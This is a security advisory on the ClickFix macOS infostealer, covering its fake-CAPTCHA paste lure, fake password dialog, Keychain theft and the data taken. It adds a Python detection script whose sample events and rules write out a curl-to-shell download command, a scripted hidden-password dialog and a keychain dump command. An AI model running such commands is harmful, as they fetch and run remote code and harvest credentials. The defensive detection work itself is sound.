A new cyberattack campaign targeting macOS users — named ClickFix — is deploying an AppleScript-based infostealer through a fake CAPTCHA social engineering technique, stealing browser passwords, session cookies, cryptocurrency wallet data, Apple Keychain credentials, and data from 200+ browser extensions. The campaign has been active since at least March 2026, with new incidents continuing to surface. Primary targets: users in Asia, particularly those in the financial sector — indicating a coordinated, financially motivated operation. Affected: all major Chromium-based browsers (Chrome, Edge, Brave, Opera); 200+ browser extensions including MetaMask, Phantom, Trust Wallet, Coinbase Wallet; password managers including 1Password, Bitwarden, Dashlane, LastPass; and authentication tools including Authy and Google Authenticator extensions.
The ClickFix Attack Method: Fake CAPTCHA → Malicious Command
Step 1: The victim is redirected to a fake CAPTCHA verification page closely resembling a legitimate website.
Step 2: The victim is instructed to copy a “verification code” and paste it into macOS Spotlight.
Step 3: The “verification code” is actually a malicious curl command that silently downloads malware from an attacker-controlled server and executes it.
Step 4: The malware collects system information, creates hidden directories to store stolen data, and transmits everything to remote command-and-control servers.
Step 5 (credential coercion): The malware displays a fake macOS security dialog mimicking genuine Apple system alerts, using authentic system icons. The dialog reappears repeatedly until the user enters their system password, which is immediately captured and sent to the attackers.
Step 6 (Keychain extraction): The malware extracts macOS Keychain data, including saved passwords, Wi-Fi credentials, secure notes, and encryption keys.
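As an added example (not code from the article or from any vendor), the following Python script turns the steps above into detection rules run over constructed process-execution events; the `timestamp|parent_process|command_line` event layout and the parent-process names are assumptions, not a real EDR export format.

```python
"""Triage constructed macOS process-execution events for ClickFix-style behaviour.
Added example, not code from the article; the event layout is an assumption."""
import re

# Each rule is (name, regex applied to the command line); each maps to a step in the article.
RULES = [
    # Step 3: a curl one-liner whose output is piped straight into a shell or interpreter.
    ("download_and_execute",
     re.compile(r"\bcurl\b.*\|\s*(sh|bash|zsh|osascript|python3?)\b")),
    # Step 5: a scripted dialog that hides typed input, i.e. a password prompt
    # produced by a script rather than by a system process.
    ("scripted_password_dialog",
     re.compile(r"\bosascript\b.*display dialog.*hidden answer", re.I)),
    # Step 6: bulk export of the login keychain from the command line.
    ("keychain_export", re.compile(r"\bsecurity\s+dump-keychain\b")),
]

# Parents from which a pasted "verification code" would originate (Step 2).
USER_INPUT_PARENTS = {"Spotlight", "Terminal", "iTerm2"}

def parse_event(line):
    # Assumed layout: timestamp|parent_process|command_line (command may itself contain '|').
    ts, parent, cmd = line.rstrip("\n").split("|", 2)
    return {"ts": ts, "parent": parent, "cmd": cmd}

def classify(event):
    """Return the names of all rules the event matches (empty list if benign)."""
    hits = [name for name, rx in RULES if rx.search(event["cmd"])]
    # A download-and-execute spawned from a launcher or terminal is the ClickFix paste itself.
    if "download_and_execute" in hits and event["parent"] in USER_INPUT_PARENTS:
        hits.append("pasted_into_launcher")
    return hits

def triage(lines):
    """Return [(ts, parent, rule_names)] for every event matching at least one rule."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = classify(ev)
        if hits:
            findings.append((ev["ts"], ev["parent"], hits))
    return findings

SAMPLE_EVENTS = [  # constructed sample telemetry, not from a real incident
    "2026-03-14T09:01:02|Spotlight|/bin/sh -c curl -fsSL https://example.invalid/v | sh",
    "2026-03-14T09:01:05|sh|osascript -e 'display dialog \"Enter password\" with hidden answer'",
    "2026-03-14T09:01:07|sh|security dump-keychain -d login.keychain-db",
    "2026-03-14T09:05:00|Terminal|curl -I https://example.invalid/",
    "2026-03-14T09:06:00|Finder|open /Applications/Safari.app",
]
```

Run `triage(SAMPLE_EVENTS)` to see the three suspicious events flagged while the plain `curl -I` header check and the Finder launch pass clean.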
What Gets Stolen
System level: macOS username and system information; the system password (via fake dialog coercion); Apple Keychain contents (all saved passwords, Wi-Fi credentials, secure notes, encryption keys).
Browser level (all Chromium browsers): session tokens and cookies; autofill data; saved passwords; credit card information.
Crypto wallets (200+ extensions): MetaMask, Phantom, Trust Wallet, Coinbase Wallet: wallet seed phrases, private keys, and session data.
Password managers: 1Password, Bitwarden, Dashlane, LastPass: vault access data.
Authentication tools: Authy and Google Authenticator extensions: 2FA seed data.
Why This Attack Is Particularly Dangerous
The ClickFix method bypasses technical security controls entirely by exploiting human behaviour: the victim executes the malicious command themselves, believing it is a CAPTCHA verification step. No exploit, no vulnerability, no malware download prompt — the victim is the delivery mechanism. Apple’s macOS security warnings (introduced in recent versions) alert users when pasting potentially harmful commands into system terminals — but users running outdated systems or those who ignore security warnings remain fully vulnerable. The fake macOS dialog’s use of authentic Apple system icons makes it visually indistinguishable from legitimate system prompts for most users.
Shunyatax Global Insight
The ClickFix campaign’s primary targeting of Asia’s financial sector users is the specific risk signal for Indian finance professionals, NRI investors, and UAE-based business owners who use macOS for business operations. The combination of Keychain theft + crypto wallet extraction + password manager compromise in a single attack means a successful ClickFix infection gives the attacker access to every credential stored on the device — banking portals, GST login, EmaraTax, business email, and cryptocurrency holdings simultaneously.
For Indian businesses and NRIs using macOS for financial operations, the ClickFix attack has a specific audit implication: any credential stored in Chrome’s saved passwords, macOS Keychain, or a browser-based password manager extension is potentially compromised if the device has been exposed to a fake CAPTCHA page. Professional auditing services in India that include digital security protocol review — ensuring business financial credentials are stored in hardware-backed password managers (not browser-based extensions), that macOS systems are updated to the latest version, and that business banking uses hardware MFA tokens rather than authenticator app extensions — provide the security architecture that limits ClickFix’s credential harvest to non-critical data. The 200+ affected browser extensions include every major crypto wallet and password manager; the mitigation is hardware-backed credential storage that browser-level malware cannot access.
Immediate action if exposed: change all passwords from a separate, unaffected device; revoke all active browser sessions; rotate crypto wallet seed phrases to new wallets; contact your bank’s fraud team. Report: CERT-In at cert-in.org.in / cybercrime.gov.in / 1930.
Quick News Summary
ClickFix campaign (active since March 2026): macOS-targeted AppleScript infostealer via fake CAPTCHA social engineering. Method: fake CAPTCHA page → victim copies “verification code” → pastes into macOS Spotlight → malicious curl command executes → malware downloads + activates. Credential coercion: fake Apple system dialog (authentic icons) repeatedly appears until system password entered → immediately captured. Stolen: Keychain (passwords, Wi-Fi, secure notes, encryption keys); all Chromium browser data (session tokens, cookies, autofill, saved passwords, credit cards); 200+ browser extensions including MetaMask, Phantom, Trust Wallet, Coinbase Wallet, 1Password, Bitwarden, Dashlane, LastPass, Authy, Google Authenticator. Primary targets: Asia financial sector users. Apple mitigation: macOS security warnings for terminal paste commands (recent versions only). Key insight: no technical exploit — victim executes malicious command themselves via social engineering. Immediate response: change all passwords from separate device; revoke browser sessions; rotate crypto wallets; contact bank fraud team. Report: cert-in.org.in / 1930.